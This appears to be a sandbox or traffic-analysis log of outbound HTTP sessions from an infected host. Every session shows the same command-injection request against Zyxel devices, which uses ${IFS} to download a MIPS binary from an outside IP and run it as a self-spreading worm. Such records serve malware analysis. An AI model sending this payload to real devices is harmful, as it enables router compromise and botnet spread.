                                                Jan 12, 2024 18:16:12.193608999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1810192.168.2.233945452.77.204.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193635941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1811192.168.2.233286478.48.172.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193696976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1812192.168.2.2353636171.0.17.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193731070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1813192.168.2.234812425.247.82.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193759918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1814192.168.2.2359960168.105.108.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193799973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1815192.168.2.2335454202.40.235.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193855047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1816192.168.2.2337408102.209.166.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193883896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1817192.168.2.2334152139.112.245.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.193918943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1818192.168.2.2349708129.76.141.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197659969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1819192.168.2.235292031.101.201.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197698116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1820192.168.2.2333518208.17.177.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197720051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1821192.168.2.233694044.100.170.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197748899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1822192.168.2.2341760144.88.177.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197818995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1823192.168.2.2355840209.191.181.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197832108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1824192.168.2.23566861.243.45.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197876930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1825192.168.2.2349636156.121.90.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197896004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1826192.168.2.2352416193.235.15.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197932005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1827192.168.2.2352668193.24.28.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.197956085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1828192.168.2.2343052180.111.79.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198008060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1829192.168.2.23529684.133.205.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198045969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1830192.168.2.23357045.193.121.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198072910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1831192.168.2.2349666171.204.74.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198128939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1832192.168.2.234099836.136.74.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198141098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1833192.168.2.2340290204.214.100.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198178053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1834192.168.2.2356174195.10.136.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198225021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1835192.168.2.2349888158.10.165.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198256969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1836192.168.2.2339218213.221.70.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198302031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1837192.168.2.234580267.179.96.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.198335886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1838192.168.2.23590288.60.3.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206612110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1839192.168.2.2353024195.81.208.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206633091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1840192.168.2.2340072152.250.84.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206656933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1841192.168.2.235000657.124.226.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206690073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1842192.168.2.2349376100.144.160.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206708908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1843192.168.2.234671853.24.152.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206768990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1844192.168.2.235120023.105.111.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206798077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1845192.168.2.2348846110.119.24.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206824064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1846192.168.2.2344508189.86.64.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206856966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1847192.168.2.2358746203.246.38.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206902027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1848192.168.2.2349194139.231.32.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206933022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1849192.168.2.234328044.98.148.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206960917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1850192.168.2.2341740213.240.185.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.206988096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1851192.168.2.2335120221.90.229.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207022905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1852192.168.2.2353142181.16.14.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207058907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1853192.168.2.234560012.250.244.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207082987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1854192.168.2.2357652135.95.202.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207128048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1855192.168.2.2336776155.56.190.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207154036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1856192.168.2.2345516200.245.161.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207180023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1857192.168.2.234835477.43.167.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207207918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1858192.168.2.235336677.111.196.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207242966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1859192.168.2.2336628171.50.202.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207278013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1860192.168.2.2355598180.128.205.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207326889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1861192.168.2.2360326218.8.149.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207354069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1862192.168.2.234659637.94.250.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207390070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1863192.168.2.233715062.129.171.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207425117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1864192.168.2.2353480209.223.103.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207468033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1865192.168.2.23433381.158.186.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207496881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1866192.168.2.234972897.144.60.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207519054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1867192.168.2.2340568169.60.97.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207557917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1868192.168.2.2350350153.202.156.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207590103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1869192.168.2.233939449.219.161.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207614899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1870192.168.2.23397825.26.173.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207640886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1871192.168.2.2352794219.210.197.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.207706928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1872192.168.2.234759477.75.53.209443
                                                TimestampBytes transferredDirectionData
